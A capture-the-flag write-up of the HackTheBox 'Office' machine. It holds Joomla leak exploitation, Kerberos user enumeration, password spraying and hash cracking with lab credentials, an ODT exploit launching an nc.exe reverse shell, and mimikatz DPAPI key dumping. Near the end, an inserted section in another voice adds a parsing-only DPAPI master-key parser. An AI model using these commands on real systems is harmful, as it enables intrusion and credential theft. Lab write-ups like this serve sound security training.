【season-4】htb office wp


USER

Information gathering

└─$ sudo nmap -sS -sV -T4 -A $IP  -p$(sudo nmap -sS -p- $IP --min-rate=5000|grep -i open |awk -F '/' '{print $1}'|tr -s '\n' ',') --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-19 06:28 EST
Nmap scan report for DC.office.htb (10.10.1x.x)
Host is up (0.45s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-19 19:28:59Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
50285/tcp open msrpc Microsoft Windows RPC
56622/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-02-19T19:30:51
|_ start_date: N/A
|_clock-skew: 7h59m57s

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 196.61 ms 10.10.16.1 (10.10.16.1)
2 196.55 ms DC.office.htb (10.10.11.3)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.58 seconds

ldapsearch

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=office,DC=htb
ldapServiceName: office.htb:dc$@OFFICE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=office,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=office,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=office,DC=htb
namingContexts: CN=Configuration,DC=office,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=DomainDnsZones,DC=office,DC=htb
namingContexts: DC=ForestDnsZones,DC=office,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 258779
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=office,DC=htb
dnsHostName: DC.office.htb
defaultNamingContext: DC=office,DC=htb
currentTime: 20240218132143.0Z
configurationNamingContext: CN=Configuration,DC=office,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

smbmap didn't turn up anything useful.

The web server runs Joomla, and robots.txt makes that pretty obvious, so let's open it up and take a look.

[screenshot: web_index]

Went straight to searching for a CVE; I remembered there had been a Joomla CVE recently.

CVE-2023-23752

https://blog.csdn.net/dahege666/article/details/129728789

An information leak I used on another box not long ago, and it exists on this site too. Normally the part of the leak to focus on is /v1/config/application, but just in case I still ran through its other endpoints as well.

for i in $(cat newurlapi);do curl http://10.10.11.3/api/index.php/$i?public=true -s|wc;echo $i;done

I dumped the endpoints into a file.. the URL above describing the vulnerability covers that part.

One thing to watch with this Joomla bug: if there's a lot of data it will span multiple pages, so don't assume you're done once the PoC finishes. Check manually whether there are more pages, or change the range parameters, e.g. http://10.10.11.3/api/index.php/v1/config/application?public=true&page[offset]=0&page[limit]=100, which shows 100 entries on one page; the default seems to be forty-something..? Adjust to your needs.

[screenshot: web_user_get]
One endpoint paid off: a username, "Tony Stark".

http://10.10.11.3/api/index.php/v1/users?public=true&page[offset]=1

Build a wordlist with username-anarchy

└─$ ./username-anarchy Tony Stark
tony
tonystark
tony.stark
tonystar
tonys
t.stark
tstark
stony
s.tony
starkt
stark
stark.t
stark.tony
ts

A run of cme gives tstark.
Generally when port 88 is open I also enumerate domain users, and that turned up a batch here too.

└─$ kerbrute userenum --dc 10.10.11.3 -d office.htb ~/Desktop/htb/office/wordlist/rockyou.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/18/24 - Ronnie Flathers @ropnop

2024/02/18 01:36:24 > Using KDC(s):
2024/02/18 01:36:24 > 10.10.11.3:88

2024/02/18 01:36:24 > [+] VALID USERNAME: tstark@office.htb
2024/02/18 02:16:58 > [+] VALID USERNAME: ewhite@office.htb
2024/02/18 02:16:58 > [+] VALID USERNAME: etower@office.htb
2024/02/18 02:16:59 > [+] VALID USERNAME: dwolfe@office.htb
2024/02/18 02:17:01 > [+] VALID USERNAME: dlanor@office.htb
2024/02/18 02:17:01 > [+] VALID USERNAME: dmichael@office.htb
2024/02/18 02:17:01 > [+] VALID USERNAME: dc@office.htb

Run cme again with the password obtained from the leaking endpoint

└─$ crackmapexec smb 10.10.11.3 -u worldlistuser  -p 'H0lOgrams4reTakIng0Ver754!'
SMB 10.10.11.3 445 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [-] office.htb\tstark:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!

I spent a while trying this password against the web login and found it wasn't the right one.. so I went on to look at SMB.
In SMB I found a packet capture.
Filter out the port 443 traffic, which makes up the largest share, and keep the rest for slow analysis.
[screenshot: netpack-1]
Here I saw krb5 traffic; my guess is that a client calling the SMB service caused it, so I looked up its encryption type.
[screenshot: netpack-2]
On top of that, this is itself somewhat related to the TGT, though I don't remember it that well.. so my feeling was that the key portion would more or less be crackable.

hashcat's example-hash documentation

https://hashcat.net/wiki/doku.php?id=example_hashes

You can see that etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18) is crackable.
So run it and get the password

└─$ hashcat '$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc' -m 19900 /usr/share/wordlists/rockyou.txt --show
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

At this point I got stuck with this password; later a friend reminded me and I thought of using it to log into the web as a different user.

My Joomla shell was again triggered by modifying a template, same as the previous box.

Once in, since it was the web user, I ran winpeas and poked around for a long time without finding a way through;
I noted down the suspected exploitation points

CredentialEnrollmentManagerUserSvc_938f9(CredentialEnrollmentManagerUserSvc_938f9)[C:\Windows\system32\CredentialEnrollmentManager.exe] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: GenericExecute (Start/Stop)
Credential Enrollment Manager

mysql(mysql)[C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql] - Auto - Running - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\xampp\mysql\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])

Apache2.4(Apache Software Foundation - Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
Possible DLL Hijacking in binary folder: C:\xampp\apache\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28


Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_938f9: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_938f9: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_938f9: GenericExecute (Start/Stop)
DevicePickerUserSvc_938f9: GenericExecute (Start/Stop)
DevicesFlowUserSvc_938f9: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_938f9: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_938f9: GenericExecute (Start/Stop)
UdkUserSvc_938f9: GenericExecute (Start/Stop)
UnistoreSvc_938f9: GenericExecute (Start/Stop)
UserDataSvc_938f9: GenericExecute (Start/Stop)
WpnUserService_938f9: GenericExecute (Start/Stop)


Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
C:\Program Files (x86)\Microsoft\Edge\Application
==> C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240214004729711_5632.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])
==> C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240214004730057_7276.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])
C:\Program Files (x86)\Microsoft\EdgeWebView\Application
==> C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\20240117095959336_7728.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])
==> C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\20240214004755691_7932.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])


RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RegPerms: ppotts [FullControl]
Key: OneDrive
Folder: C:\Program Files\Microsoft OneDrive
File: C:\Program Files\Microsoft OneDrive\OneDrive.exe /background (Unquoted and Space detected)


RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
RegPerms: S-1-5-21-1199398058-4196589450-691661856-1106 [FullControl]
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
=================================================================================================


RegPath: HKLM\Software\Wow6432Node\Classes\htmlfile\shell\open\command
RegPerms: S-1-5-21-1199398058-4196589450-691661856-1106 [FullControl]
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)


C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml


2023-07-19 22:51 OFFICE\ppotts Word C:\xampp\htdocs\internal\applications\msf.docm
2023-06-06 21:20 OFFICE\ppotts Word C:\xampp\htdocs\internal\applications\test.docm
2023-05-09 16:05 OFFICE\ppotts Word C:\xampp\htdocs\internal\applications\asdf-it-30-000-0-5-years-asdf@test-com.doc
2023-05-09 16:04 OFFICE\ppotts Word C:\xampp\htdocs\internal\applications\test-it-30-000-0-5-years-test@test-com.doc
2023-05-04 18:05 OFFICE\ppotts Office C:\xampp\htdocs\internal\applications\Doc1.docm
2023-05-04 18:04 OFFICE\ppotts Word C:\Users\Administrator\Desktop\Doc1.docm

C:\xampp\htdocs\internal\applications\123-it-30-000-0-5-years-123asd@a-com_resume.odt(2/18/2024 9:02:49 PM)
C:\xampp\htdocs\internal\applications(2/18/2024 9:02:49 PM)
C:\ProgramData\job.txt(2/14/2024 5:35:41 PM)
C:\Users\PPotts\Music\job_offering.ps1(2/14/2024 5:36:02 PM)
C:\Users\PPotts\Music(2/14/2024 5:36:02 PM)
C:\ProgramData(2/14/2024 5:35:41 PM)

Uploaded RunasCs and used tstark's password to get a shell back.

Next, netstat -ano showed that besides 80 there was a service listening on 8083, so I curled it and got a response.

Tunnelled it out with frp and saw it's a website; the only thing left there is resume.php
[screenshot: local_web]
Here I tried some ancient .doc phishing tricks, and later found out it had to be odt.. a friend said after he got in he saw there was only one place that parses odt.

CVE-2023-2255 was used here

python3 CVE-2023-2255.py --cmd 'C:\users\public\downloads\nc.exe xxxx xxxx -e cmd' --output nc.odt

Shell came back as PPOTTS@OFFICE.HTB


Actually, if you're diligent, you'd already have noticed at winpeas time that you have a few cached keys;
making a habit of checking manually works too

C:\Program Files\LibreOffice 5\program>cmdkey /list
cmdkey /list

Currently stored credentials:

Target: LegacyGeneric:target=MyTarget
Type: Generic
User: MyUser

Target: Domain:interactive=office\hhogan
Type: Domain Password
User: office\hhogan

But they can't be pulled out and used directly.
For example, running

C:\Program Files\LibreOffice 5\program>runas /savecred /user:hhogan "cmd.exe"
runas /savecred /user:hhogan "cmd.exe"
Enter the password for hhogan:

C:\Program Files\LibreOffice 5\program>

But they can be exported with mimikatz.

(DPAPI is a bit more involved but should be doable too; the principles probably aren't quite the same, but both involve calls to the domain credential service; I'll look into it separately later.)

Here is the exploitation process:

1. First locate the master key files and the credential store files

PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> dir -force
dir -force


Directory: C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs- 5/2/2023 4:13 PM 900 BK-OFFICE
-a-hs- 1/17/2024 3:43 PM 24 Preferred



PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> dir -force C:\Users\PPotts\AppData\Roaming\microsoft\Credentials
dir -force C:\Users\PPotts\AppData\Roaming\microsoft\Credentials

2. Use mimikatz to load all the master key files first

    Directory: C:\Users\PPotts\AppData\Roaming\microsoft\Credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E
-a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
-a-hs- 1/18/2024 11:53 AM 374 E76CCA3670CD9BB98DF79E0A8D176F1E
-a-hs- 2/19/2024 2:27 PM 374 FCC3ECA2B60DDA9204044C22EEC7CC48


PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> C:/users/public/downloads/mimikatz.exe
C:/users/public/downloads/mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d"
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 8bc9f4a7b9094394e57e92daedeafcb9
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : f97146093504382ec842cd2eec5f2bbfbbdd83ab6c4e44ada82d5ae23d1a05422fe6d1378165d4434bf41737616acf823e86c69424271d0f72684018a0928045ef77b719003b352644398f4286795b1297bee821deec898cb167aa76d984808014aa0d22136688c3

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 26773bc8263172355939bdb9cb33e2f9
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 540c745f74ac62c43d245e850eb9952d6daf6a803163b94683eb82a30bf3d20d8e72d4e1003e0f17ca2575722c009e1855333ddacb7f08702369b0035aff50163eee5d2f2384fe28

[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : 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
pbAccesscheck : a98be73386a3dca744e20b13b967e3bc4a1f58bf9be981bf84cf2e2c4daab8ca4def27d6e22540e7eebadd6c122ed75a1b991532d88794e2e999673385241275fe2735bbbb46f9e88dbd799589b42d572ca6b14ecf279a6d


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM:
key : 2c19b1b2f1784e79edaed52a319cc5b4ad42179d4906fd084aef8e6e6dd9b8db
sha1: 4961d54be229fd871debd903b3d518ea4d362c42

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb"
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : c521daa0857ee4fa6e4246266081e94c
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : a2741b13d7261697be4241ebbe05098a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : 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
pbAccesscheck : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM:
key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2
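
As an added example (not part of the original writeup, and not mimikatz code), here is a Python parser for the on-disk layout of the master key file that dpapi::masterkey prints above. It assumes the layout mimikatz's DPAPI structures describe: a 128-byte MASTERKEYS header (dwVersion, the GUID as 72 bytes of UTF-16LE, dwFlags and four 64-bit section lengths) followed by the masterkey, backupkey, credhist and domainkey sections, each key section starting with dwVersion, a 16-byte salt, rounds, algHash and algCrypt. The lengths above, 136 + 104 + 0 + 372 plus the header, give exactly the 740 bytes shown in the directory listing, which is the consistency check a forensic analyst makes before trusting any field. The sample file is constructed here: the GUIDs, salts, rounds and section lengths copy the first file above, the key bytes are placeholders. The function and constant names are mine, and the code only parses; it decrypts nothing.

```python
"""Parser for the on-disk layout of a DPAPI user master key file (parsing only, no decryption)."""
import struct
import uuid

# Windows CryptoAPI algorithm ids; the two that appear in the mimikatz output above are HMAC and 3DES
CALG_NAMES = {0x8009: "CALG_HMAC", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512",
              0x6603: "CALG_3DES", 0x6610: "CALG_AES_256"}

HEADER_LEN = 128  # MASTERKEYS header: 3 DWORDs, 72-byte UTF-16LE GUID, 3 DWORDs, 4 QWORD lengths
MK_HDR_LEN = 32   # MASTERKEY sub-header: dwVersion, salt[16], rounds, algHash, algCrypt
DK_HDR_LEN = 28   # DOMAINKEY sub-header: dwVersion, dwSecretLen, dwAccesscheckLen, GUID


def parse_key_section(buf):
    """[masterkey] / [backupkey]: a 32-byte header followed by the wrapped key material."""
    version, salt, rounds, alg_hash, alg_crypt = struct.unpack_from("<I16sIII", buf, 0)
    return {"dwVersion": version, "salt": salt.hex(), "rounds": rounds,
            "algHash": CALG_NAMES.get(alg_hash, hex(alg_hash)),
            "algCrypt": CALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "pbKey": buf[MK_HDR_LEN:].hex()}


def parse_domainkey_section(buf):
    """[domainkey]: the copy of the key that the DC's backup key (guidMasterKey) can unwrap."""
    version, secret_len, check_len = struct.unpack_from("<III", buf, 0)
    if DK_HDR_LEN + secret_len + check_len != len(buf):
        raise ValueError("domainkey length fields do not match the section size")
    secret_end = DK_HDR_LEN + secret_len
    return {"dwVersion": version, "dwSecretLen": secret_len, "dwAccesscheckLen": check_len,
            "guidMasterKey": "{%s}" % uuid.UUID(bytes_le=buf[12:DK_HDR_LEN]),
            "pbSecret": buf[DK_HDR_LEN:secret_end].hex(),
            "pbAccesscheck": buf[secret_end:secret_end + check_len].hex()}


def parse_masterkey_file(data):
    """Split a master key file into its header fields and four variable-length sections."""
    if len(data) < HEADER_LEN:
        raise ValueError("file is shorter than the 128-byte MASTERKEYS header")
    version = struct.unpack_from("<I", data, 0)[0]
    guid = data[12:84].decode("utf-16-le")          # 36 characters stored as UTF-16LE
    flags = struct.unpack_from("<I", data, 92)[0]
    mk_len, bk_len, ch_len, dk_len = struct.unpack_from("<QQQQ", data, 96)
    # The check a forensic parser should always make: header + all sections == file size.
    if HEADER_LEN + mk_len + bk_len + ch_len + dk_len != len(data):
        raise ValueError("section lengths do not add up to the file size")
    off, sections = HEADER_LEN, {}
    for name, length in (("masterkey", mk_len), ("backupkey", bk_len),
                         ("credhist", ch_len), ("domainkey", dk_len)):
        sections[name] = data[off:off + length]
        off += length
    return {"dwVersion": version, "szGuid": "{%s}" % guid, "dwFlags": flags,
            "dwMasterKeyLen": mk_len, "dwBackupKeyLen": bk_len,
            "dwCredHistLen": ch_len, "dwDomainKeyLen": dk_len,
            "masterkey": parse_key_section(sections["masterkey"]) if mk_len else None,
            "backupkey": parse_key_section(sections["backupkey"]) if bk_len else None,
            "credhist": sections["credhist"].hex(),
            "domainkey": parse_domainkey_section(sections["domainkey"]) if dk_len else None}


# --- builders, used only to construct an offline sample in the same layout ---
def build_key_section(salt_hex, key):
    return struct.pack("<I16sIII", 2, bytes.fromhex(salt_hex), 18000, 0x8009, 0x6603) + key


def build_domainkey_section(guid, secret, check):
    return (struct.pack("<III", 2, len(secret), len(check))
            + uuid.UUID(guid).bytes_le + secret + check)


def build_masterkey_file(guid, masterkey, backupkey, domainkey, credhist=b""):
    header = struct.pack("<III", 2, 0, 0) + guid.encode("utf-16-le") + struct.pack("<III", 0, 0, 0)
    header += struct.pack("<QQQQ", len(masterkey), len(backupkey), len(credhist), len(domainkey))
    return header + masterkey + backupkey + credhist + domainkey


# Constructed sample: GUIDs, salts, rounds and section lengths mirror the first file above;
# the key bytes are placeholders, not real key material.
SAMPLE_FILE = build_masterkey_file(
    "10811601-0fa9-43c2-97e5-9bef8471fc7d",
    build_key_section("8bc9f4a7b9094394e57e92daedeafcb9", bytes(range(104))),  # 32 + 104 = 136
    build_key_section("26773bc8263172355939bdb9cb33e2f9", bytes(range(72))),   # 32 + 72  = 104
    build_domainkey_section("e523832a-e126-4d6e-ac04-ed10da72b32f",
                            b"\xaa" * 256, b"\xbb" * 88),                      # 28 + 256 + 88 = 372
)

if __name__ == "__main__":
    parsed = parse_masterkey_file(SAMPLE_FILE)
    print("file size:", len(SAMPLE_FILE))                      # 740, like the listing above
    for name in ("szGuid", "dwMasterKeyLen", "dwBackupKeyLen", "dwCredHistLen", "dwDomainKeyLen"):
        print(f"{name:15} {parsed[name]}")
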